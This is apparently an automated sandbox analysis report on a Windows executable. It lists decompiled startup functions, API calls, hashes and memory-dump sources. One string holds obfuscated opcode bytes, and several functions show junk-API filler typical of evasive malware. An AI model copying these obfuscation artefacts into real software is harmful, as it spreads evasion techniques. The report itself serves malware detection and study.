Instruction ID: 034d14d88cb055e6d472a40f8ec74e841bbf8644bf1d44e9418bb8139dfff1ff
Opcode Fuzzy Hash: cc95048392ece7c05b19dd5d0f7eb1cf9550257f557a03f29d89fbe37de57b15
Instruction Fuzzy Hash: 37812975A00218ABDB20DB54CD85BDAB7B4BB08700F1482EEE519772D1CBB96F85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00402410, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;

				_push(0xffffffff);
				_push(0x403770);
				_push(0x402612);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x407128 =  *0x407128 | 0xffffffff;
				 *0x40712c =  *0x40712c | 0xffffffff;
				 *(__p__fmode()) =  *0x40711c;
				 *(__p__commode()) =  *0x407118;
				 *0x407124 = _adjust_fdiv;
				_t27 = E00402611( *_adjust_fdiv);
				if( *0x406fd0 == 0) {
					__setusermatherr(E0040260E);
				}
				E004025FC(_t27);
				_push(0x405028);
				_push(0x405024);
				L004025F6();
				_v112 =  *0x407114;
				_t6 =  &_v116; // 0x405028
				__getmainargs( &_v100, _t6,  &_v104,  *0x407110,  &_v112);
				_push(0x405020);
				_push(0x405000); // executed
				L004025F6(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00402624(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004025F0();
				return _t41;
			}

0x00402413
0x00402415
0x0040241a
0x00402425
0x00402426
0x00402433
0x00402438
0x0040243d
0x00402444
0x0040244b
0x0040245e
0x0040246c
0x00402475
0x0040247a
0x00402485
0x0040248c
0x00402492
0x00402493
0x00402498
0x0040249d
0x004024a2
0x004024ac
0x004024bd
0x004024c5
0x004024cb
0x004024d0
0x004024d5
0x004024e2
0x004024e4
0x004024ea
0x00402526
0x0040252b
0x0040252c
0x0040252c
0x004024ec
0x004024ec
0x004024ec
0x004024ed
0x004024f0
0x004024f2
0x004024fd
0x004024ff
0x004024ff
0x00402500
0x00402500
0x004024fd
0x00402503
0x00402507
0x00000000
0x00000000
0x0040250d
0x00402514
0x0040251e
0x00402533
0x00402520
0x00402520
0x00402520
0x0040253f
0x00402544
0x00402548
0x0040254e
0x00402553
0x00402555
0x00402558
0x00402559
0x0040255a
0x00402561

APIs

__set_app_type.MSVCRT ref: 0040243D
__p__fmode.MSVCRT ref: 00402452
__p__commode.MSVCRT ref: 00402460
__setusermatherr.MSVCRT ref: 0040248C
_initterm.MSVCRT ref: 004024A2
__getmainargs.MSVCRT ref: 004024C5
_initterm.MSVCRT ref: 004024D5
GetStartupInfoA.KERNEL32(?), ref: 00402514
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402538
exit.MSVCRT ref: 00402548
_XcptFilter.MSVCRT ref: 0040255A

Strings

(P@, xrefs: 004024BD, 004024C0

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: (P@
API String ID: 801014965-91804302
Opcode ID: 27f86d6643a1254b99d707d69796055d6d9f1b2c58ade87e966f82bbe79c0aaa
Instruction ID: 17517763960c9d08206b2b8dd168876b2a812f0bf5aabc2cbc39559012d1f467
Opcode Fuzzy Hash: 27f86d6643a1254b99d707d69796055d6d9f1b2c58ade87e966f82bbe79c0aaa
Instruction Fuzzy Hash: AB418BB1804308AFDB209FA4DE49AAABBB8FB09710F20057FE451B72D1C6B85941DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401820, Relevance: 19.7, APIs: 13, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

#4710.MFC42(?,?,?,?,00402778,000000FF), ref: 00401851
#2863.MFC42(00000000,?,?,?,?,00402778,000000FF), ref: 00401869
#540.MFC42 ref: 00401887
#4160.MFC42(00000065), ref: 0040189B
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040192C
CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00401948
SendMessageA.USER32(?,00000080,00000001,?), ref: 00401995
SendMessageA.USER32(?,00000080,00000000,?), ref: 004019D1
#922.MFC42(?,00407100,004070FC,004070F8,004070F4), ref: 004019F7
#922.MFC42(?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A23
#922.MFC42(?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A4C
#6877.MFC42(00406FC8,00407104,?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401A7F
#540.MFC42(00406FC8,00407104,?,?,?,?,?,00407100,004070FC,004070F8,004070F4), ref: 00401ADF

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #922$#540FileMessageSend$#2863#4160#4710#6877CreateModuleName
String ID:
API String ID: 3777263574-0
Opcode ID: cc95048392ece7c05b19dd5d0f7eb1cf9550257f557a03f29d89fbe37de57b15
Instruction ID: 034d14d88cb055e6d472a40f8ec74e841bbf8644bf1d44e9418bb8139dfff1ff
Opcode Fuzzy Hash: cc95048392ece7c05b19dd5d0f7eb1cf9550257f557a03f29d89fbe37de57b15
Instruction Fuzzy Hash: 37812975A00218ABDB20DB54CD85BDAB7B4BB08700F1482EEE519772D1CBB96F85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004013D0, Relevance: 12.1, APIs: 8, Instructions: 91fileCOMMON

Download Yara Rule

APIs

#1205.MFC42 ref: 004013F7
#1199.MFC42(00000064,00000000,000000FF), ref: 00401406
#1134.MFC42(00000000), ref: 00401414
#2621.MFC42 ref: 00401422
#5717.MFC42 ref: 0040142D
#5716.MFC42 ref: 0040143C
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000000), ref: 0040149E
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 004014BA

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File$#1134#1199#1205#2621#5716#5717CreateModuleName
String ID:
API String ID: 3187058082-0
Opcode ID: 824f2d215b699af46ae784ad8cd60a46cc537455c8978a2aae81c9de020a38b0
Instruction ID: 9b55a2ef3098a90591ddc17978d9381f7210454ca7d382de3417788a3121f65a
Opcode Fuzzy Hash: 824f2d215b699af46ae784ad8cd60a46cc537455c8978a2aae81c9de020a38b0
Instruction Fuzzy Hash: A931B634941219ABDB60EFA1CD4AB99B374AF40714F2042BEE505B72E1DFB85A408B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402624, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

#1576.MFC42(?,?,?,D%@,00402544,00000000,?,0000000A), ref: 00402634

Strings

D%@, xrefs: 00402624

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #1576
String ID: D%@
API String ID: 1976119259-385707385
Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction ID: 50b4a7b3333f08eeb35bf7ae67fd2578e4549a5775935e3edfc97eadc187546c
Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction Fuzzy Hash: 1EB00876018386ABCB02DE919905E2ABAA2BF98304F484C1EB2A1110A187668428AB56

Uniqueness

Uniqueness Score: -1.00%

Function 004016E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4COMMON

Download Yara Rule

APIs

#537.MFC42(Mc645M8161C645826cC6458341MC6M45MMMM846CC645856CMC645MM86M6Fc645M87M63M88MM5D88c6458C47MC6M45M8D65C645M8e74C645M8F46Mc6M459069c645M916cMC645MM9265MMC6M4593M53C645MMMMMMM9469C6M45957AMC6MM4596M65885DM97C645c852C645MC965c645CA61MC6M45CB64MC6M45ccM46C645cd69C645M,004016D5), ref: 004016EA

Strings

Mc645M8161C645826cC6458341MC6M45MMMM846CC645856CMC645MM86M6Fc645M87M63M88MM5D88c6458C47MC6M45M8D65C645M8e74C645M8F46Mc6M459069c645M916cMC645MM9265MMC6M4593M53C645MMMMMMM9469C6M45957AMC6MM4596M65885DM97C645c852C645MC965c645CA61MC6M45CB64MC6M45ccM46C645cd69C645M, xrefs: 004016E0

Memory Dump Source

Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp Download File

Similarity

API ID: #537
String ID: Mc645M8161C645826cC6458341MC6M45MMMM846CC645856CMC645MM86M6Fc645M87M63M88MM5D88c6458C47MC6M45M8D65C645M8e74C645M8F46Mc6M459069c645M916cMC645MM9265MMC6M4593M53C645MMMMMMM9469C6M45957AMC6MM4596M65885DM97C645c852C645MC965c645CA61MC6M45CB64MC6M45ccM46C645cd69C645M
API String ID: 4256512136-1661908015
Opcode ID: 269529c8268e5533cf2155105adb32578785ecf864ff708aa0ca55ff306a37c1
Instruction ID: f17563fe98301e3d8e0c295bdb303cc1729dbef747dfec38baf0000a63f77f41
Opcode Fuzzy Hash: 269529c8268e5533cf2155105adb32578785ecf864ff708aa0ca55ff306a37c1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00402580, Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

_onexit.KERNELBASE ref: 0040258D
__dllonexit.MSVCRT ref: 004025A3

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 99111255a49266e4836be7d03c5a90fdce03ba57334792b5bc64e4e4d725839c
Instruction ID: 3033bbb125f2c932eb7164596f2ee8a61ab74c6cfaf0af607cc99a6c82457121
Opcode Fuzzy Hash: 99111255a49266e4836be7d03c5a90fdce03ba57334792b5bc64e4e4d725839c
Instruction Fuzzy Hash: 66C01270848300BACB012F21BE0E5597B51EB99732B64867AF265342F0977D2635AA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004016E0, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

#537.MFC42(00405D08,004016D5), ref: 004016EA

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #537
String ID:
API String ID: 4256512136-0
Opcode ID: 269529c8268e5533cf2155105adb32578785ecf864ff708aa0ca55ff306a37c1
Instruction ID: f17563fe98301e3d8e0c295bdb303cc1729dbef747dfec38baf0000a63f77f41
Opcode Fuzzy Hash: 269529c8268e5533cf2155105adb32578785ecf864ff708aa0ca55ff306a37c1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401160, Relevance: 15.0, APIs: 10, Instructions: 34fileregistrywindowCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040116A
GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401178
FindFirstFileA.KERNEL32(00000000,00000000), ref: 00401182
MessageBoxIndirectA.USER32(00000000), ref: 0040118A
RegDeleteKeyW.ADVAPI32(00000000,00000000), ref: 00401194
GetCharABCWidthsFloatA.GDI32(00000000,00000000,00000000,00000000), ref: 004011A2
FindNextFileW.KERNEL32(00000000,00000000), ref: 004011AC
EnableWindow.USER32(00000000,00000000), ref: 004011B6
GetTimeZoneInformation.KERNEL32(00000000), ref: 004011BE
ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$CharDeleteEnableExitFirstFloatIndirectInfoInformationLocaleMessageNextProcessTimeViewWidthsWindowZone
String ID:
API String ID: 387652844-0
Opcode ID: 412b54de5b61dddf54cf50568a78abce0dcb73f78f3bdaf6fa1af32ba1f9fa63
Instruction ID: 8c51f5a217cead61b05c59c05cd421a87c6b17fff41cd05f571255464dbde35c
Opcode Fuzzy Hash: 412b54de5b61dddf54cf50568a78abce0dcb73f78f3bdaf6fa1af32ba1f9fa63
Instruction Fuzzy Hash: 67F052353C5240B6F2602FD15E0BB597E286745B07F144054B30A680E445A06645562E

Uniqueness

Uniqueness Score: -1.00%

Function 00401C40, Relevance: 13.6, APIs: 9, Instructions: 78windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00401C59
#470.MFC42(?), ref: 00401C76
SendMessageA.USER32(?,00000027,?,00000000), ref: 00401CA3
GetSystemMetrics.USER32(0000000B), ref: 00401CAB
GetSystemMetrics.USER32(0000000C), ref: 00401CB6
GetClientRect.USER32(?,?), ref: 00401CCD
DrawIcon.USER32(?,?,?,?), ref: 00401D17
#755.MFC42 ref: 00401D20
#2379.MFC42 ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
String ID:
API String ID: 1397574227-0
Opcode ID: 53fa7488a5a854440a1a23aa09015ff2bc1e6540da60ae6e80a7e7109753014d
Instruction ID: 6b7cf9a39df90bf87ff92fcd612bba58bd57baa984f1b891e9a4c2e5792cc22d
Opcode Fuzzy Hash: 53fa7488a5a854440a1a23aa09015ff2bc1e6540da60ae6e80a7e7109753014d
Instruction Fuzzy Hash: 65312C75D00119DFDB24DFB8CA89AAEBBB4BF48300F1081ADE545A7291DA74A941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401160, Relevance: 12.0, APIs: 8, Instructions: 34fileregistrytimeCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040116A
GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401178
FindFirstFileA.KERNEL32(00000000,00000000), ref: 00401182
RegDeleteKeyW.ADVAPI32(00000000,00000000), ref: 00401194
GetCharABCWidthsFloatA.GDI32(00000000,00000000,00000000,00000000), ref: 004011A2
FindNextFileW.KERNEL32(00000000,00000000), ref: 004011AC
GetTimeZoneInformation.KERNEL32(00000000), ref: 004011BE
ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File$Find$CharDeleteExitFirstFloatInfoInformationLocaleNextProcessTimeViewWidthsZone
String ID:
API String ID: 3462356098-0
Opcode ID: 412b54de5b61dddf54cf50568a78abce0dcb73f78f3bdaf6fa1af32ba1f9fa63
Instruction ID: 8c51f5a217cead61b05c59c05cd421a87c6b17fff41cd05f571255464dbde35c
Opcode Fuzzy Hash: 412b54de5b61dddf54cf50568a78abce0dcb73f78f3bdaf6fa1af32ba1f9fa63
Instruction Fuzzy Hash: 67F052353C5240B6F2602FD15E0BB597E286745B07F144054B30A680E445A06645562E

Uniqueness

Uniqueness Score: -1.00%

Function 02373BD4, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.333656848.0000000002370000.00000040.00000001.sdmp, Offset: 02370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: a1b665580834cd89518532668ed95bd9805259c3d517e0d8267d00e32a7ec8f0
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 421152723401059FDB64DF59DCC1FA673EAEB89220B298095ED05CB315D679EC41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401EA0, Relevance: 27.1, APIs: 18, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401EA0(intOrPtr __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v32;
				char _v48;
				char _v56;
				void* _v64;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _t55;
				intOrPtr _t82;

				 *[fs:0x0] = _t82;
				_v116 = __ecx;
				L00402404();
				_v8 = 0;
				L00402404();
				_v8 = 1;
				L004023FE();
				_v8 = 2;
				L004023F8();
				_v8 = 3;
				L004023F8();
				_v8 = 4;
				L004023F8();
				_v8 = 5;
				_v108 = E004012C0( &_v56);
				L004023F2();
				_v8 = 6;
				L004023EC();
				_v8 = 5;
				L004023E6();
				_v112 = E004012E0( &_v88,  &_v32,  &_v32,  &_v32,  &_v32);
				L004023F2();
				_v8 = 7;
				L004023EC();
				_v8 = 5;
				L004023E6();
				_v8 = 4;
				L004023E6();
				_v8 = 3;
				L004023E6();
				_v8 = 2;
				L004023E6();
				_v8 = 1;
				__imp__#9( &_v32,  &_v104, _v112, 1,  &_v96, _v108, 1, 0x80020004, 0xa, 0, 2, 1, 2,  *[fs:0x0], E004027F8, 0xffffffff);
				_v8 = 0;
				_t55 =  &_v48;
				__imp__#9(_t55);
				_v8 = 0xffffffff;
				__imp__#9( &_v80);
				 *[fs:0x0] = _v16;
				return _t55;
			}

0x00401eb1
0x00401ebb
0x00401ec5
0x00401eca
0x00401ed8
0x00401edd
0x00401eeb
0x00401ef0
0x00401ef7
0x00401efc
0x00401f03
0x00401f08
0x00401f0f
0x00401f14
0x00401f20
0x00401f2c
0x00401f31
0x00401f3c
0x00401f41
0x00401f48
0x00401f65
0x00401f71
0x00401f76
0x00401f81
0x00401f86
0x00401f8d
0x00401f92
0x00401f99
0x00401f9e
0x00401fa5
0x00401faa
0x00401fb1
0x00401fb6
0x00401fbe
0x00401fc4
0x00401fc8
0x00401fcc
0x00401fd2
0x00401fdd
0x00401fe6
0x00401ff0

APIs

#464.MFC42(00000001,00000002), ref: 00401EC5
#464.MFC42(00000000,00000002,00000001,00000002), ref: 00401ED8
#465.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401EEB
#434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401EF7
#434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F03
#434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F0F

Part of subcall function 004012C0: #4033.MFC42(?,00000006,00000002,00000009,00000000,00000000,?,00401F20,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004012CF

#433.MFC42(00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F2C
#839.MFC42(?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F3C
#5575.MFC42(?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F48

Part of subcall function 004012E0: #4033.MFC42(?,0000000E,00000001,00000009,00000002,0040520C,00000002,00000002,00000002,00000000,00401F65,?,?,?,?,?), ref: 00401305

#433.MFC42(00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F71
#839.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F81
#5575.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F8D
#5575.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401F99
#5575.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401FA5
#5575.MFC42(?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00401FB1
#9.OLEAUT32(?,?,00000001,00000001,?,?,?,?,?,00000002,00000001,80020004,0000000A,00000000,00000002,00000001), ref: 00401FBE
#9.OLEAUT32(?), ref: 00401FCC
#9.OLEAUT32(?), ref: 00401FDD

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #5575$#434$#4033#433#464#839$#465
String ID:
API String ID: 943837034-0
Opcode ID: 42dbcbc24b1c881d89f3986ed78658c36f544ed43673c517e1d6649f67c16f1a
Instruction ID: e863dd39016a29842b83eb9b3c7516125cf6d1dbde4ce8d12ad99f9311d01cf8
Opcode Fuzzy Hash: 42dbcbc24b1c881d89f3986ed78658c36f544ed43673c517e1d6649f67c16f1a
Instruction Fuzzy Hash: 23417430C05288EADB05DBE4DA9ABDDBB74AF20304F10816DE5127B1D2DBBC1B08DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00402020, Relevance: 22.6, APIs: 15, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00402020(intOrPtr __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v32;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				char* _t32;
				intOrPtr _t49;

				 *[fs:0x0] = _t49;
				_v92 = __ecx;
				L00402867();
				L00402404();
				_v8 = 0;
				L00402404();
				_v8 = 1;
				L004023FE();
				_v8 = 2;
				L004023F8();
				_v8 = 3;
				L004023F8();
				_v8 = 4;
				L004023F8();
				_v8 = 5;
				L004023E6();
				L004023E6();
				_v36 = 1;
				_v8 = 4;
				L004023E6();
				_v8 = 3;
				L004023E6();
				_v8 = 2;
				L004023E6();
				_v8 = 1;
				_t32 =  &_v32;
				__imp__#9(_t32, 0x80020004, 0xa, 0, 2, 1, 2,  *[fs:0x0], E00402846, 0xffffffff);
				_v8 = 0;
				__imp__#9( &_v56);
				_v8 = 0xffffffff;
				__imp__#9( &_v88);
				 *[fs:0x0] = _v16;
				return _t32;
			}

0x00402031
0x0040203b
0x00402041
0x0040204d
0x00402052
0x00402060
0x00402065
0x00402073
0x00402078
0x0040207f
0x00402084
0x0040208b
0x00402090
0x00402097
0x0040209c
0x004020a3
0x004020ab
0x004020b0
0x004020b7
0x004020be
0x004020c3
0x004020ca
0x004020cf
0x004020d6
0x004020db
0x004020df
0x004020e3
0x004020e9
0x004020f1
0x004020f7
0x00402102
0x0040210b
0x00402115

APIs

#1669.MFC42 ref: 00402041
#464.MFC42(00000001,00000002), ref: 0040204D
#464.MFC42(00000000,00000002,00000001,00000002), ref: 00402060
#465.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00402073
#434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 0040207F
#434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 0040208B
#434.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 00402097
#5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020A3
#5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020AB
#5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020BE
#5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020CA
#5575.MFC42(80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020D6
#9.OLEAUT32(?,80020004,0000000A,00000000,00000002,00000001,00000002), ref: 004020E3
#9.OLEAUT32(?), ref: 004020F1
#9.OLEAUT32(?), ref: 00402102

Memory Dump Source

Source File: 00000000.00000001.328251298.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: #5575$#434$#464$#1669#465
String ID:
API String ID: 918964270-0
Opcode ID: 5249fbbd2fbec79a21ddf6da1d4f8e48b637fd065f7794585851135324101570
Instruction ID: a99555386ed46a1410cd316f3afd82919259b6b1b03cde1c42c6a689c00be722
Opcode Fuzzy Hash: 5249fbbd2fbec79a21ddf6da1d4f8e48b637fd065f7794585851135324101570
Instruction Fuzzy Hash: 12312170805288EADB05EBA4DB9EBDCBB74AF11308F6081ADE511771D2DBBC1B08DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00401D60, Relevance: 19.5, APIs: 13, Instructions: 40memoryregistrywindowCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00401D67
HideCaret.USER32(00000000), ref: 00401D6F
GetDesktopWindow.USER32 ref: 00401D75
GetCommandLineA.KERNEL32 ref: 00401D7B
RegisterClipboardFormatW.USER32(00000000), ref: 00401D83
CreateCompatibleDC.GDI32(00000000), ref: 00401D8B
PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00401D9B
GetACP.KERNEL32 ref: 00401DA1
GetEnvironmentStrings.KERNEL32 ref: 00401DA7
GetClientRect.USER32(00000000,00000000), ref: 00401DB1
GetDateFormatA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401DC3
GetCursorPos.USER32(00000000), ref: 00401DCB
HeapReAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402879

Memory Dump Source

Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp Download File

Similarity

API ID: CommandFormatLine$AllocCaretClientClipboardCompatibleCreateCursorDateDesktopEnvironmentHeapHideMessagePeekRectRegisterStringsWindow
String ID:
API String ID: 1244642730-0
Opcode ID: 3566cb7b843034e973bab0e95ff240c53ab780565685a93776f49c83a6b60d9e
Instruction ID: af9d4de3cf86c2f6b80bec87d207abd21e06541653e40ff6df8a1295e72425d5
Opcode Fuzzy Hash: 3566cb7b843034e973bab0e95ff240c53ab780565685a93776f49c83a6b60d9e
Instruction Fuzzy Hash: 15F0077529A240EBE2507FA1EF0EB087E3CAB04B43F1041B5F306B91F58AB457448B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00401DDF, Relevance: 12.0, APIs: 8, Instructions: 23memorytimeCOMMON

Download Yara Rule

APIs

UpdateWindow.USER32(00000000), ref: 00401DE1
GetOEMCP.KERNEL32 ref: 00401DE7
HeapDestroy.KERNEL32(00000000), ref: 00401DEF
ShowWindow.USER32(00000000,00000000), ref: 00401DF9
GetCaretBlinkTime.USER32 ref: 00401DFF
SetStdHandle.KERNEL32(00000000,00000000), ref: 00401E09
FlushFileBuffers.KERNEL32(00000000), ref: 00401E11

Part of subcall function 00401E70: #6215.MFC42(00000000), ref: 00401E85

#2379.MFC42 ref: 00401E26

Memory Dump Source

Source File: 00000000.00000002.333287834.0000000000400000.00000002.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.333310503.0000000000405000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.333314759.0000000000406000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.333337535.0000000000408000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$#2379#6215BlinkBuffersCaretDestroyFileFlushHandleHeapShowTimeUpdate
String ID:
API String ID: 3091587674-0
Opcode ID: cb7df9ebdcdb3c6dd5c1f0e0f5033e8655c62a5119d6ff19a90f684e00c90495
Instruction ID: 8831d63713359388988f6f63f2f7d58f073549cc635a453978b6df9dfabe448d
